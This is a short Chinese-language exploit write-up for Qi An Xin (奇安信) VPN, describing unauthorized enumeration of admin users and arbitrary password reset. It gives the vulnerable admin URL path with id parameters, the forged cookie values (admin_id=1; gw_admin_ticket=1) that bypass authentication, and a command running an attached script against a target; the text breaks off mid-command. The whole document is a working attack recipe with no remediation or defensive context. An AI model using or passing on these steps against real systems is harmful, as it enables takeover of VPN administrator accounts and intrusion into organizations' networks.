奇安信vpn存在未授权管理用户遍历及任意账号密码修改
访问url:
https://x.xxx.xxx.cn/
使用hackerbar访问一下url,携带cookie参数
https://x.xxx.xxx.cn/admin/group/x_group.php?id=1https://x.xxx.xxx.cn/admin/group/x_group.php?id=3
cookie:admin_id=1; gw_admin_ticket=1;
其中id=1为系统自带匿名用户,id=2为管理用户
本次修改匿名用户,使用附件脚本
python3 userlist_motifyuserpassword.py -t https: